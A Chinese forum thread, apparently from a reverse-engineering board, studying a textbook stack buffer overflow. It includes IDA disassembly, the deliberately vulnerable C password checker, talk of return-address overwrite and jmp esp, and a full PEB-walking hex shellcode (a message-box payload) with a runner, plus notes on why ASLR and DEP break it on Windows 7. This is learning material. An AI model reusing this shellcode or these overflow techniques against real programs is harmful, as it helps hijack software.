自己用idapro反汇编了一下， 觉得还是idapro的格式比较好看点， 此处附上：
.text:00401000 sub_401000      proc near               ; CODE XREF: _main+24p
.text:00401000
.text:00401000 var_8           = byte ptr -8
.text:00401000 arg_0           = dword ptr  4
.text:00401000
.text:00401000                 sub     esp, 8
.text:00401003                 push    ebx
.text:00401004                 push    esi
.text:00401005                 push    edi
.text:00401006                 mov     edi, [esp+14h+arg_0]
.text:0040100A                 mov     esi, offset a1234567 ; "1234567"
.text:0040100F                 mov     eax, edi
.text:00401011
.text:00401011 loc_401011:                             ; CODE XREF: sub_401000+33j
.text:00401011                 mov     dl, [eax]
.text:00401013                 mov     bl, [esi]
.text:00401015                 mov     cl, dl
.text:00401017                 cmp     dl, bl
.text:00401019                 jnz     short loc_401039
.text:0040101B                 test    cl, cl
.text:0040101D                 jz      short loc_401035
.text:0040101F                 mov     dl, [eax+1]
.text:00401022                 mov     bl, [esi+1]
.text:00401025                 mov     cl, dl
.text:00401027                 cmp     dl, bl
.text:00401029                 jnz     short loc_401039
.text:0040102B                 add     eax, 2
.text:0040102E                 add     esi, 2
.text:00401031                 test    cl, cl
.text:00401033                 jnz     short loc_401011
.text:00401035
.text:00401035 loc_401035:                             ; CODE XREF: sub_401000+1Dj
.text:00401035                 xor     edx, edx
.text:00401037                 jmp     short loc_40103E
.text:00401039 ; ---------------------------------------------------------------------------
.text:00401039
.text:00401039 loc_401039:                             ; CODE XREF: sub_401000+19j
.text:00401039                                         ; sub_401000+29j
.text:00401039                 sbb     edx, edx
.text:0040103B                 sbb     edx, 0FFFFFFFFh
.text:0040103E
.text:0040103E loc_40103E:                             ; CODE XREF: sub_401000+37j
.text:0040103E                 or      ecx, 0FFFFFFFFh
.text:00401041                 xor     eax, eax
.text:00401043                 repne scasb
.text:00401045                 not     ecx
.text:00401047                 sub     edi, ecx
.text:00401049                 lea     ebx, [esp+14h+var_8]
.text:0040104D                 mov     eax, ecx
.text:0040104F                 mov     esi, edi
.text:00401051                 mov     edi, ebx
.text:00401053                 shr     ecx, 2
.text:00401056                 rep movsd
.text:00401058                 mov     ecx, eax
.text:0040105A                 mov     eax, edx
.text:0040105C                 and     ecx, 3
.text:0040105F                 rep movsb
.text:00401061                 pop     edi
.text:00401062                 pop     esi
.text:00401063                 pop     ebx
.text:00401064                 add     esp, 8
.text:00401067                 retn
.text:00401067 sub_401000      endp

1、00401039  -004010347 这段红色标记指令是什么意思
上面两个sbb是吧strcmp结果放edx
下面几条是strlen

2、strcpy为什么生成的指令变成这幅德行了， 为什么有00401056  和0040105F  两处的REP MOV指令呢
rep movsd是按dword拷贝，rep movesb按字节拷贝，ecx里是串长度，这个长度就是1里strlen出来的
这里编译器分了两步做，先把长度除以4，按dw拷，再将余数按byte拷，估计是当字符串长度比较长时候这样效率更高一点

3、这段函数里面缓冲区8字节+4字节的authenticated，应该是12字节， release版本通过sub esp，8分配了buffer的空间，authenticated通过寄存器来保存。  所以输入“12345678”的时候把返回指令的低字节给覆盖掉了，结果报错。  release版本是不是无法像debug版本那样通过输入12345678,用0x00覆盖掉authenticated的低字节，达到hack的目的？
在strcmp后面插一条 printf("%x", &authenticated);
可以强制让编译器分配栈空间

4、release版本不用ebp来保存stack frame base address？
编译选项里关掉FPO省略栈指针

另外 关于第三个问题
不能覆盖变量，能覆盖返回地址就能控制程序流向了 直接retn到输出成功信息那里不就行了，理论上
或者输入内容里写一段shellcode retn jmp esp xxx的也行啊，那多优雅啊，相比之下覆盖变量就弱了哈哈

给传个你的bin啊

非常感谢， 汇编弱了点， 准备多看看， bin添加到附件了。

failwest的帖子：
http://bbs.pediy.com/showthread.php?t=56479

c代码如下：
----------
#include <stdio.h>
#define PASSWORD "1234567"

int verify_password (char *password)
{
  int authenticated;
  char buffer[8];  // add local buff to be overflowed
  authenticated=strcmp(password,PASSWORD);
  strcpy(buffer,password);  //over flowed here!  
  return authenticated;
}

main()
{
  int valid_flag=0;
  char password[1024];
  while(1)
  {
    printf("please input password:       ");
    scanf("%s",password);
    valid_flag = verify_password(password);
    if(valid_flag)
    {
      printf("incorrect password!\n\n");
    }
    else
    {
      printf("Congratulation! You have passed the verification!\n");
      break;
    }
  }
}

上传的附件：

• verifypwd.rar （17.29kb，1次下载）

1用的跳板 2直接retn会异常

上传的附件：

• password1.txt （0.03kb，4次下载）
• password2.txt （0.01kb，4次下载）

jmp esp方法吗？ win7下跳板技术没用吧? 我看每次user32,kernel32的baseaddress都变化了。

自己按照failwest的方法， 测试了下面的shellcode， 在winxp下可以， win7下异常了。
这段shellcode主要是通过PEB，从倒入表中查找到LoadLibraryA、MessageBoxA和ExitProcess的va，然后调用MessageBoxA和ExitProcess。
可否讲解下 为何这段通用shellcode在win7下就不行呢？

char popup_general[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8";

main()
{
       
        __asm
        {
                lea eax, popup_general
                push eax
                ret
        }
}

win7下有两个问题
1是vs2010编出来的默认情况下数据段是不可执行的加句#pragma comment(linker,"/SECTION:.data,RWE")就行了
2是模块链表第一个是kernelbase而不是kernel32这个shellcode用了kernel32里三个函数名的hash，kernelbase里没有所以会崩这个不好弄要改 的

1、都是vc6编译的， 不是数据区不能execute的缘故。
2、能够找到kernel32的基地址应该能够写出通用的shellcode
谢谢指点， 继续深入的学习，发现win7下dll加载地址的随机选择， PEB的随机， 导致了这种通用代码很难写。
而且GS编译选项对栈的保护， 栈的溢出也几乎不可能了。 win7应该很安全吧

搜了一下win7 shellcode，找到定位的方法， 呵呵， 没领会你的意思， 惭愧， 要深入学习才行啊